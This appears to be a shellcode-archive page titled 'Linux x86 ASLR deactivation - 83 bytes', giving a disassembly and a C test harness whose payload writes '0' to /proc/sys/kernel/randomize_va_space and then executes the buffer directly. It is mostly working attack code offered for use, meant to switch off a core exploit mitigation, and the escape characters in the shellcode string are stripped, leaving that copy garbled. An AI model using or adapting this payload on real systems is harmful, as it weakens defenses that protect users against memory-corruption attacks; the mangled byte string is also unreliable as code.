[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux x86 ASLR deactivation - 83 bytes
# Published : 2012-08-02
# Author :
# Previous Title : ARM ifconfig eth0 and Assign Address
# Next Title : win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes
/*
Title: Linux x86 ASLR deactivation - 83 bytes
Author: Jean Pascal Pereira <pereira@secbiz.de>
Web: http://0xffe4.org
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 70 61 63 65 push $0x65636170
8048068: 68 76 61 5f 73 push $0x735f6176
804806d: 68 69 7a 65 5f push $0x5f657a69
8048072: 68 6e 64 6f 6d push $0x6d6f646e
8048077: 68 6c 2f 72 61 push $0x61722f6c
804807c: 68 65 72 6e 65 push $0x656e7265
8048081: 68 79 73 2f 6b push $0x6b2f7379
8048086: 68 6f 63 2f 73 push $0x732f636f
804808b: 68 2f 2f 70 72 push $0x72702f2f
8048090: 89 e3 mov %esp,%ebx
8048092: 66 b9 bc 02 mov $0x2bc,%cx
8048096: b0 08 mov $0x8,%al
8048098: cd 80 int $0x80
804809a: 89 c3 mov %eax,%ebx
804809c: 50 push %eax
804809d: 66 ba 30 3a mov $0x3a30,%dx
80480a1: 66 52 push %dx
80480a3: 89 e1 mov %esp,%ecx
80480a5: 31 d2 xor %edx,%edx
80480a7: 42 inc %edx
80480a8: b0 04 mov $0x4,%al
80480aa: cd 80 int $0x80
80480ac: b0 06 mov $0x6,%al
80480ae: cd 80 int $0x80
80480b0: 40 inc %eax
80480b1: cd 80 int $0x80
*/
#include <stdio.h>
char shellcode[] = "x31xc0x50x68x70x61x63x65x68x76x61x5fx73x68"
"x69x7ax65x5fx68x6ex64x6fx6dx68x6cx2fx72x61"
"x68x65x72x6ex65x68x79x73x2fx6bx68x6fx63x2f"
"x73x68x2fx2fx70x72x89xe3x66xb9xbcx02xb0x08"
"xcdx80x89xc3x50x66xbax30x3ax66x52x89xe1x31"
"xd2x42xb0x04xcdx80xb0x06xcdx80x40xcdx80";
int main()
{
fprintf(stdout,"Lenght: %dn",strlen(shellcode));
(*(void (*)()) shellcode)();
}